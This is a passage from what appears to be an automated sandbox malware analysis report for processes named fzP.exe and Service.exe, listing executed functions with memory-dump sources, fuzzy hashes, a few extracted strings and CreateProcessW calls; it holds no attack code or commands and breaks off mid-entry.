Haq, xrefs: 00D8095D

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: d8cf5d55c34b1da61b3f09e599885509e6b0b1b34cd4cfc7ee3203185384c8cb
Instruction ID: de6d92ce8c7af302f3985020b557d69329af30d0786d8d781b9420a952f2b0ed
Opcode Fuzzy Hash: d8cf5d55c34b1da61b3f09e599885509e6b0b1b34cd4cfc7ee3203185384c8cb
Instruction Fuzzy Hash: C9218330E05218DFCB54EFB8D8557AE7FB1AF84300F1444B9D4459B28ADB308E55CBA1

Function 00D81304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15095def6d51646380344faf643273b4ac300685fde29e9bdcc4c0c948562116
Instruction ID: 1b9b39e7acac870ee6e3953eaa047f37198124ea76ead64ebbde96ac7dc232a5
Opcode Fuzzy Hash: 15095def6d51646380344faf643273b4ac300685fde29e9bdcc4c0c948562116
Instruction Fuzzy Hash: 6D31C0B490834ADFCB01EFB8D8956AD7BB2FF84300F204969E405AB355EB345A95CB61

Function 00D80BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2047f6028c1c256f9d07f63528f3729026c9b9c60e721b81455ab3cbce8abd8
Instruction ID: dbb6e9058a06d15e2a2d12ab331504ce955e28428ec0f993e7ec48fc0de10647
Opcode Fuzzy Hash: e2047f6028c1c256f9d07f63528f3729026c9b9c60e721b81455ab3cbce8abd8
Instruction Fuzzy Hash: 3671A6757002068FCB55EF78D85866E7BE3FF88700B108968E40ADB7A5DF749D068BA1

Function 00D80BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90fca20cdde8e92d010cc9fb0e4e8cad6ab5e577543d1769a9ee9366ccdfb33
Instruction ID: 837778f4e9da0249eea59b75249f8b5dd89e13626294d2cbba8493dc501ca6a7
Opcode Fuzzy Hash: e90fca20cdde8e92d010cc9fb0e4e8cad6ab5e577543d1769a9ee9366ccdfb33
Instruction Fuzzy Hash: D54164757007068FCB6AFB78E85856E7BA3FF853013108928E40ACB7A5DF749D468B91

Function 00D81771 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01190565d2f23b844bb8447a6846f80fa5bf6f19d8652c341a1f567f39f39ad
Instruction ID: b674fe2ecb623bb45498268c4b3ff2f45f9515a17dcd7c28c6e659a90bf1bc9b
Opcode Fuzzy Hash: b01190565d2f23b844bb8447a6846f80fa5bf6f19d8652c341a1f567f39f39ad
Instruction Fuzzy Hash: 3921F371B042069FCB04AFBD98552AEBFEAEFC9310B14447DD54AC7291DE34890687B1

Function 00D81660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91aacddea242a10b0832909fc73dd0c10946683a7c518a0363c700cfed4b6d69
Instruction ID: 33cfb2b0662724f5a7ac099a8be3528c59c3ce2a9b9c88246f2b9563f986a396
Opcode Fuzzy Hash: 91aacddea242a10b0832909fc73dd0c10946683a7c518a0363c700cfed4b6d69
Instruction Fuzzy Hash: 7121B5B490430ADFCB05FFB8D8856AD7BB6FF84300F204968E405AB344DB346A95CBA1

Function 00D80CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361b02e3f02892ac301503dceaf4b45026ff4f158433711bd7a16e90797c3d42
Instruction ID: d0946b597c89c9dad4fd9e087f37c9d2bc4b6e8c3060d76f0a4ade51d2257cff
Opcode Fuzzy Hash: 361b02e3f02892ac301503dceaf4b45026ff4f158433711bd7a16e90797c3d42
Instruction Fuzzy Hash: CE214271700B024BCB69BB7D945856E7AE2FF882143108E2DD16B9B790DF34DD4A4BE2

Function 00D80838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61561a261c3dd16e01326e6d62c277c8b74df8de74160a1692bb0a1dc0fc20a1
Instruction ID: 82107d3ccdd9fcaf271231122e5aa39564db558553cc7a72e67d129d630c3c56
Opcode Fuzzy Hash: 61561a261c3dd16e01326e6d62c277c8b74df8de74160a1692bb0a1dc0fc20a1
Instruction Fuzzy Hash: 421121F415D2468FCB02EF68F8D09993BB2EF45705B205E98E4488F22AD6745D56CF81

Function 00D80848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2187098213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edfa2994941696aa7f21ba34d02e4956b27421d35bbe4eee5766a4aca706c425
Instruction ID: e1df04ea65ec697780f024f5a6b1d34c2209d6aa1aa2933a9605fdf619e79e41
Opcode Fuzzy Hash: edfa2994941696aa7f21ba34d02e4956b27421d35bbe4eee5766a4aca706c425
Instruction Fuzzy Hash: 7B01EDF415920A9FCB02FF18F8C0A4537A6FB44705B308E64B4488F229D6746D568F81

Analysis Process: fzP.exePID: 4052, Parent PID: 4308COMMON

Executed Functions

Function 00EA0ECB Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00EA0EFF
Ij, xrefs: 00EA113A
$]q, xrefs: 00EA0EE6

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID: Xaq$$]q$Ij
API String ID: 0-3366223111
Opcode ID: ac7dc83912f63f07c8fd2c24ec15e828ade28eb18f2dc14162722e023532d24c
Instruction ID: 0d11e4d9ff13985ccb26287264e140f36ac57bf3f7f679d1c699d659971b314f
Opcode Fuzzy Hash: ac7dc83912f63f07c8fd2c24ec15e828ade28eb18f2dc14162722e023532d24c
Instruction Fuzzy Hash: 2A91AF74F052189BCB58AF7998547BE7BB3FFC8710B1489A9E506FB284CE3498029791

Function 00EA0901 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Haq, xrefs: 00EA095D

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 43330c1e370a6641df2fcf02c181355c359706b19e64c24ab046ac1e9a230e2f
Instruction ID: 15c29fe6a95dab9d6e7ba83258cd0797606b85c118d866d2c202d446aafcc2ee
Opcode Fuzzy Hash: 43330c1e370a6641df2fcf02c181355c359706b19e64c24ab046ac1e9a230e2f
Instruction Fuzzy Hash: 0921A734E05208CFDB58EBB8D4553AE7BB1ABC9300F1145B9D448EB691EB346E46C7C1

Function 00EA1304 Relevance: .5, Instructions: 524COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8655b85afaff3d00929267c7566690ae9146af9a5b186e7a8de6ce27d508837d
Instruction ID: 44a65ec7aae0634caaac094a514c156d9f729b88cb841fc5b772abaddff12bbe
Opcode Fuzzy Hash: 8655b85afaff3d00929267c7566690ae9146af9a5b186e7a8de6ce27d508837d
Instruction Fuzzy Hash: DE31C674905349DFCB05EFB4D84679DBFB2FF85300F1045A9E005AB255EB706990CB51

Function 00EA0BD8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7afec280bf945c0dbb77964cec5f261b871d8abd888cbbde01b94d65b868ddd
Instruction ID: ba8f0b19b4cb44a0af90c0b7012bf6f32aa7a104253864ddc9755498aa7b663a
Opcode Fuzzy Hash: a7afec280bf945c0dbb77964cec5f261b871d8abd888cbbde01b94d65b868ddd
Instruction Fuzzy Hash: 3671A4757002058FCB19EF78E85972E7BA2FFC8301B104968E40AEB3A5DF74AC518B91

Function 00EA0BC8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb348ca83c27e4697808fadb281d709502e55ac2f1ff9ede5b9e56155171fa94
Instruction ID: 261a41860582b4d6b8dfe5af3071fc5bb7be1d37da1f5c3005d4180febeb59cb
Opcode Fuzzy Hash: bb348ca83c27e4697808fadb281d709502e55ac2f1ff9ede5b9e56155171fa94
Instruction Fuzzy Hash: B041FC756013028FCB19EF74E85976EBBA3FB843027104A3CD40AAF651DF746D918B92

Function 00EA1771 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db07542188ac88463358cb684e81a8fc23f9236dca4b1797545ccc6ffb2d55f2
Instruction ID: 3815994f4235a07858760b6cf1d8d552a39b6414bd9af96731fdcb679a75d9aa
Opcode Fuzzy Hash: db07542188ac88463358cb684e81a8fc23f9236dca4b1797545ccc6ffb2d55f2
Instruction Fuzzy Hash: AE21B364B002495FCB08AFBD585536EBEDAAFC9300B15442EE14AD7381EE348D0187A1

Function 00EA1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd622ac45839f45eb626de86dd99f18272e30f0abd7ed72c09d8a24df7a2a9a
Instruction ID: b5da509c7f46cbbc46a403ddf3e52df9d2cfd7f6ac55e55255cff519e8e82d09
Opcode Fuzzy Hash: 1fd622ac45839f45eb626de86dd99f18272e30f0abd7ed72c09d8a24df7a2a9a
Instruction Fuzzy Hash: 1021627490120ADFCB05EFB8D84575DBBB2FF88304F204969E405AB354DB306AE1CB51

Function 00EA0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e261162c6a0882c5d2aefcceb8ed397a628302d3cca4bee2e6cf96a162b0c6dd
Instruction ID: 9a55eae8d2e0773543877e3d336bd5b2db93091cee02f36d8b876750c0213e8c
Opcode Fuzzy Hash: e261162c6a0882c5d2aefcceb8ed397a628302d3cca4bee2e6cf96a162b0c6dd
Instruction Fuzzy Hash: BF2162727007424BCB2DAB79D41822E76E2FFC83543104E2DD46B9B690DF34ED454B96

Function 00EA0838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90eda70c7b13bcc0414f2517d9b1cf4a7fcee4be01989eb2451fb340146420b0
Instruction ID: 1370785ce983eee8093cc997927ec35263f3f99610e7c6e4da590acf918049d9
Opcode Fuzzy Hash: 90eda70c7b13bcc0414f2517d9b1cf4a7fcee4be01989eb2451fb340146420b0
Instruction Fuzzy Hash: 8F11737410A2068FCB02FF28F882A497B76F744705B204E64F4489F62AD7746DE6CF81

Function 00EA0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2187869276.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ea0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d98db6ace62190171f3ec0730f49cbad65b0323f08dce8604b318d12347c45
Instruction ID: 7a7b1a5cf1da79592f7c8f623a5c7dca463250209017e2817a564216f2514c82
Opcode Fuzzy Hash: 22d98db6ace62190171f3ec0730f49cbad65b0323f08dce8604b318d12347c45
Instruction Fuzzy Hash: ED011E7411A2068FCB01FF18F882A4977A6F740705B208E64B4089F629D67469E68F81

Analysis Process: fzP.exePID: 4668, Parent PID: 4308COMMON

Executed Functions

Function 00E80EC0 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 00E80EE6
Xaq, xrefs: 00E80EFF

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: bbcb889190a294883793334d681cd693140f119c6a2b0c253f6e0586c540333b
Instruction ID: 9124c4d30e317b0aa666230e87e969745f9dfaf96c3d32af609963c8f4a34e08
Opcode Fuzzy Hash: bbcb889190a294883793334d681cd693140f119c6a2b0c253f6e0586c540333b
Instruction Fuzzy Hash: B7918E34F012189BDB58AF7898546BE7BB7FFC8710B1485A9D40BE7385CE34880397A1

Function 00E80901 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Haq, xrefs: 00E8095D

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 7d2db746e3206bd15268c3cfddd431a9837d0091cdc738c80fe1f8a2f7cfba21
Instruction ID: fe7f8f355be42f63b15c245182a1c0b3b128b29d62ae7c649a2df7635eb9e5cb
Opcode Fuzzy Hash: 7d2db746e3206bd15268c3cfddd431a9837d0091cdc738c80fe1f8a2f7cfba21
Instruction Fuzzy Hash: B6219230A05248DFCB94EFB8D4553AEBFB1EF88300F1084B9D449A7696EB349E55CB91

Function 00E8144B Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76b1f07f208579466967e87d2470fd2207704b0d849f09b71c7417d4ec17ac4
Instruction ID: 24bdca0965a62e47a211c331dde74c4bac6fdd4eb64f30af0fdaf5daea0ce7a2
Opcode Fuzzy Hash: b76b1f07f208579466967e87d2470fd2207704b0d849f09b71c7417d4ec17ac4
Instruction Fuzzy Hash: DD312374901346DFCB01EFB8D9147AD7BB2FF84308F2049A9E408A7752EB341A65CB51

Function 00E80BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a4e8738d02ba4f97c7265ef6d2bffc2b8d2c130580c5585347b9038884a538
Instruction ID: 80df03493a6ad689faf8e28c9f05e750bd793196c8af369ae44ab915a4414048
Opcode Fuzzy Hash: 25a4e8738d02ba4f97c7265ef6d2bffc2b8d2c130580c5585347b9038884a538
Instruction Fuzzy Hash: FD71B7347002059FCB55EF78D86866E7BF2FF84704B108969E40ADB7A5DF349C168BA1

Function 00E80BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f1acf40db3e28b5eb52f5a9f69dde9ad58ab3702ca57b718e315fe5c5123490
Instruction ID: 38338be3e7044963924345e31f111951422d0922110d77582926337c2c398c13
Opcode Fuzzy Hash: 6f1acf40db3e28b5eb52f5a9f69dde9ad58ab3702ca57b718e315fe5c5123490
Instruction Fuzzy Hash: F24196716012029FCB49FF78D86856D7BF2FF843043108A29E40AD77A5EF349C168BA1

Function 00E81771 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6358bea367d4bebb82628c3b47f95189f098284ba56b542470c5dc26cb34f14
Instruction ID: e75f5099fc5da6392f08d90bb225727feae2c8d03a6914965e80268c574df66b
Opcode Fuzzy Hash: a6358bea367d4bebb82628c3b47f95189f098284ba56b542470c5dc26cb34f14
Instruction Fuzzy Hash: 5121B471B0020A9FCB04AFBD98553AEBFEAEFC9300B154469D54ED7292DE348D1647A1

Function 00E81660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc9bbee4923194071bcc57422f0d5ffd32bd4b92825a184a8d246fb25df870f
Instruction ID: 7cb0e61f95c7b6d6c8649b300db8566db30f535f54e9cb2408dfb525a4d6c4d4
Opcode Fuzzy Hash: 1bc9bbee4923194071bcc57422f0d5ffd32bd4b92825a184a8d246fb25df870f
Instruction Fuzzy Hash: 2421A674D0120ADFCB05FFB8D95469D7BB6FF84308F204968E409A7755EB305AA1CB51

Function 00E80CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29826691e52a9962676c33deb02dab22a6fe7e76b525ce73bbe9227dbc9e5876
Instruction ID: 02bd77046743a7463bb5adf12baab29e468ad72d5d438f2ebfcfc6455b2d74f0
Opcode Fuzzy Hash: 29826691e52a9962676c33deb02dab22a6fe7e76b525ce73bbe9227dbc9e5876
Instruction Fuzzy Hash: 6C215E72700B024BCB59AF7D841816E76E6FF842543108E2DD46E9B790DF349D0A8BA2

Function 00E80838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e48e47aed4e4e41f6e0278d0b5c703f5ac93118089af425fc2984175c84f7c7
Instruction ID: 17f273c4502d78356edc97b0517b89fd34525bfc2e56aa4e8df9862d7ef8e745
Opcode Fuzzy Hash: 6e48e47aed4e4e41f6e0278d0b5c703f5ac93118089af425fc2984175c84f7c7
Instruction Fuzzy Hash: 30115B741071469FCB02EB28FA709457BB2EB4531C7204D55E4088FE1AF6746A76CF91

Function 00E80848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188847231.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e80000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac962ea2035ed23c03914cd270ce6b76da560f90310450f5b7c4f1d26d05e6f
Instruction ID: ee4736e34e50a93795ccea32d251ce43821956f7dd67e9e1d454c978936110d0
Opcode Fuzzy Hash: 9ac962ea2035ed23c03914cd270ce6b76da560f90310450f5b7c4f1d26d05e6f
Instruction Fuzzy Hash: 9001DE741022469FCB01FF18FAA0A453BA6F74431CB208E54B4088BE1AF6746A668F91

Analysis Process: Service.exePID: 1360, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	37.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	85
Total number of Limit Nodes:	5

Executed Functions

Function 011B614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B7EB9

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 32cf2b71803845e5281e471976a4cf5f18a2a1b278caa2b38e66d15d197da48e
Instruction ID: 85f42453265135bc2343f8370b026de83eac0be047bb6e8497c0a00d3161fb4b
Opcode Fuzzy Hash: 32cf2b71803845e5281e471976a4cf5f18a2a1b278caa2b38e66d15d197da48e
Instruction Fuzzy Hash: F781C275D0026DCFDB25CFA9C884BEDBBF5AB49300F1091AAE508B7250DB70AA85CF55

Function 011B4024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B7081

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 02348940bd08584251e600f513dedd883e33e15154f0ffd96caf4d42d0a82c49
Instruction ID: 1d9c9a1356638fe0441394ceacfd58b2a62863cd1d25a4d960ad8a7a7fc42f66
Opcode Fuzzy Hash: 02348940bd08584251e600f513dedd883e33e15154f0ffd96caf4d42d0a82c49
Instruction Fuzzy Hash: 2F81C2B4D00269CFDB25CFA9C884BDDBBF5BB49300F1491AAE508B7250DB70AA85CF55

Function 011B1B9C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B1D79

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2e009b7c9e21d046f1f05225ee6bfc25dfacd34e7b545a288becf8776c5cf088
Instruction ID: e0f62748e1a6f1284c980ae66ee726d9a673b6fa7486160613cba03038516ccb
Opcode Fuzzy Hash: 2e009b7c9e21d046f1f05225ee6bfc25dfacd34e7b545a288becf8776c5cf088
Instruction Fuzzy Hash: 6D81D4B4D00219DFDB25CFA9D984BDDBBF5BB09300F1091AAE508B7250DB30AA89CF55

Function 011B3D94 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B5011

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ae24bca029a1dc090897fa391071c170a26749388594553254af21957e5d334d
Instruction ID: 210ba21c8798818f27df14c6be8f50d8103e552fa9da468baa837ecbb81b6c37
Opcode Fuzzy Hash: ae24bca029a1dc090897fa391071c170a26749388594553254af21957e5d334d
Instruction Fuzzy Hash: C381C2B4D002698FDF25CFA9C984BDDBBF5BB09300F1091AAE509B7250DB70AA85CF55

Function 011B7CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B7EB9

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3396fcc92d6f4e54794cd757c780c2f3e035ec7a0649b41337f35ab599fd1dd9
Instruction ID: d06548a47d49ffbf6de5706b880708de4f0a7dc225f8603f90520c2935731433
Opcode Fuzzy Hash: 3396fcc92d6f4e54794cd757c780c2f3e035ec7a0649b41337f35ab599fd1dd9
Instruction Fuzzy Hash: 1B81C3B5D0022DCFDB25CFA9C984BEDBBF5AB49300F1091AAE508B7250DB709A85CF55

Function 011B07A4 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 011B1D79

Memory Dump Source

Source File: 0000000B.00000002.2241414894.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_11b0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 40450021ddb0e11b6ad622564c9c6d8d0027febea965f65c3464b4f7dd5255a2
Instruction ID: 707edbbd9fcb3481fef120de4c37aff8b5bc7547f796a981aacf89820fa76823
Opcode Fuzzy Hash: 40450021ddb0e11b6ad622564c9c6d8d0027febea965f65c3464b4f7dd5255a2
Instruction Fuzzy Hash: 1781C3B4D0022DDFDB25CFA9D984BDDBBF5AB09300F1091AAE508B7250DB709A89CF55

Function 011B4E34 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

